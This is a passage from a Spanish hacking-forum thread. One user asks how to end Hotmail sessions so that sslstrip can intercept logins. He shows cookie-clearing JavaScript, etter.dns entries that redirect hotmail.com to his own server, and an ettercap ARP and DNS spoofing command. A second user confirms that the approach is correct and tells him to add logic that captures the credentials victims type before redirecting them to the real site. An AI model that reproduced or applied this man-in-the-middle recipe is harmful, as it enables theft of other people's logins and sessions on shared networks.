elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  ¿como cerrar conexiones para usar sslstrip?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿como cerrar conexiones para usar sslstrip?  (Leído 4,945 veces)
thedevilini

Desconectado Desconectado

Mensajes: 52


Ver Perfil
¿como cerrar conexiones para usar sslstrip?
« en: 4 Enero 2012, 03:43 am »

veran, estaba buscando resolver mi duda y parace que alguien de este foro ya encontro la solucion, el problema es que no se en que tengo fallas, el tema se encuentra en esta direccion :   

http://foro.elhacker.net/hacking_avanzado/sslstrip_arpspoof_cerrar_conexion-t344668.0.html#ixzz1iN54fsOJ



Hola a todos los que han comentado esta pregunta, la Conclusión fue muy buena (la de controlar una pagina que contenga un codigo que elimine las cookies) ... alguien de ustedes puede decirme ¿cual es la forma correcta para hacerlo? ... veran les cuento lo que hago... (no me ha funcionado, asi que agradeceria que me dijeran: ¿que es lo que hago mal? o ¿que me falta hacer? ...

COMIENZO modificando el fichero "index.html" ubicado en: " root/var/www "  (obiamente mis intenciones son las de hacer un servidor apache con el codigo funcional antes mencionado:

<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">

//Código en javascript que me elimina las cookies

<body >
 <script language="javascript" type="text/javascript">
 if (document.cookie != "") {
 if (confirm("Eliminar todas las Cookies?")) {
 la_cookie = document.cookie.split("; ")
 fecha_fin = new Date
 fecha_fin.setDate(fecha_fin.getDate()-1)
 for (i=0; i<la_cookie.length; i++) {
 mi_cookie = la_cookie.split("=")[0]
 document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
 }
 document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
 }
 }
 </script>
 </body>

Lo copio y lo pego tal cual esta... Despues voy a: " backtrack,services,HTTPD,apache_start " (para activar un servidor apache)  cabe mencionar que borro las 2 carpetas que estan en la misma ubicacion que el "index.html" con la intencion de que no estorben en la apertura de la pagina...
paso seguido procedo a modificar la tabla dns abriendo una consola y tecleando :
#locate etter.dns
#nano /usr/share/ettercap/etter.dns
ya que me abre la tabla dns, procedo a sustituir las direcciones ip que estan ahi indicadas, por la mia (en la que ahora esta corriendo el servidor apache con el codigo para borrar las cookies)...
y como la pagina que quiero cerrar es la de hotmail, me que da de la siguiente manera... :

# microsoft sucks ;)
# redirect it to www.linux.org
#

hotmail.com      A   MI_DIRECCION_IP
*.hotmail.com    A   MI_DIRECCION_IP
www.hotmail.com  PTR MI_DIRECCION_IP      # Wildcards in PTR are not allowed

guardo los cambios y procedo a ejecutar :  "ettercap -T -q -i wlan0 -P dns_spoof -M arp // // "

EN RESUMEN: lo que hice fue crear un servidor apache con el codigo para borrar las cookies antes indicado, despues Hacer un envenenemiento dns para reedirigir hotmail al servidor apache... lamentablemente no he tenido muy buenos resultados... ¿Podrian ayudarme?   muchas gracias...
En línea

adastra
Endless Learner
Ex-Staff
*
Desconectado Desconectado

Mensajes: 885


http://thehackerway.com/


Ver Perfil WWW
Re: ¿como cerrar conexiones para usar sslstrip?
« Respuesta #1 en: 4 Enero 2012, 13:43 pm »

Vale, el proceso es correcto, pero no has dicho que es en concreto lo que te esta fallando... no se realiza el envenenamiento correctamente, no se ejecuta la página con el script? no se limpian las cookies? que falla?
En línea

thedevilini

Desconectado Desconectado

Mensajes: 52


Ver Perfil
Re: ¿como cerrar conexiones para usar sslstrip?
« Respuesta #2 en: 5 Enero 2012, 05:17 am »

veras, tengo una pc con windows xp para hacer las pruebas.

Primero inicio sesion en hotmail en la pc que tiene windows xp, despues con la otra hago todo el proceso del servidor apache con el codigo "que elimina las cookies" y hago el envenenamiento DNS con el ettercap redireccionando al servidor apache.

Despues intento navegar dentro de mi bandeja de entrada y no pasa nada  :s , todo esta muy normal.

Paso seguido compruebo con el konqueror de backtrack5, intento abrir hotmail pero hooo sorpresa!!! en lugar de hotmail me abre la pagina cargada en el servidor apache(lo que demuestra que el envenenamiento DNS esta correcto no??? )  y no me redirecciona despues al verdadero dominio de hotmail ...  saludos
En línea

adastra
Endless Learner
Ex-Staff
*
Desconectado Desconectado

Mensajes: 885


http://thehackerway.com/


Ver Perfil WWW
Re: ¿como cerrar conexiones para usar sslstrip?
« Respuesta #3 en: 5 Enero 2012, 09:47 am »

te falta hacer la redirección desde la página que has creado en Apache... busca en google manuales de PHP, se trata de algo muy sencillo, ya casi lo tienes hecho.

http://es.kioskea.net/faq/537-php-redireccionar-a-otra-pagina-web
En línea

thedevilini

Desconectado Desconectado

Mensajes: 52


Ver Perfil
Re: ¿como cerrar conexiones para usar sslstrip?
« Respuesta #4 en: 5 Enero 2012, 23:21 pm »

olle no es suficiente con el redireccionamiento echo con ettercap??  ...  o es que debo insertar otro codigo en la misma pagina para que se vuelva a redireccionar?? ... y tengo otra duda.. : ¿con que extensión debo guardar el archivo "index"??  (con html, jsp o asp???? ... gracias!
En línea

adastra
Endless Learner
Ex-Staff
*
Desconectado Desconectado

Mensajes: 885


http://thehackerway.com/


Ver Perfil WWW
Re: ¿como cerrar conexiones para usar sslstrip?
« Respuesta #5 en: 5 Enero 2012, 23:45 pm »

vamos por partes, parece que no has comprendido, lo primero es que ettercap redirecciona una petición de un usuario a un servidor (web en este caso) ese es TU servidor, luego lo que debes hacer en tu servidor es implementar la lógica necesaria para capturar los datos que el usuario ha ingresado y posteriormente redireccionar (con php, jsp, etc.) al dominio real, es más una cuestión de probar y jugar un poco, pero no es nada complicado.
Sobre lo otro que preguntas... un manual básico de HTML/PHP/JSP de los que abundan por internet aclarará tus dudas, eso no es hacking avanzado, google es tu amigo.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Ayuda] Cerrar puerto 631 y cerrar conexiones en Ubuntu 10.04
GNU/Linux
777Rubenix777 7 10,776 Último mensaje 26 Noviembre 2010, 09:23 am
por 777Rubenix777
sslstrip & arpspoof (cerrar conexión) « 1 2 3 »
Hacking
rigg 20 16,547 Último mensaje 4 Enero 2012, 04:44 am
por thedevilini
¿Está nuestra red local preparada para conexiones como la de Adamo 300Mbps?
Noticias
wolfbcn 0 1,435 Último mensaje 11 Noviembre 2012, 14:18 pm
por wolfbcn
Cómo usar conexiones seguras VPN en Windows 10
Noticias
wolfbcn 0 1,236 Último mensaje 17 Junio 2016, 21:29 pm
por wolfbcn
Cómo crear y usar conexiones VPN en Windows 10
Noticias
wolfbcn 0 1,591 Último mensaje 29 Noviembre 2016, 14:46 pm
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines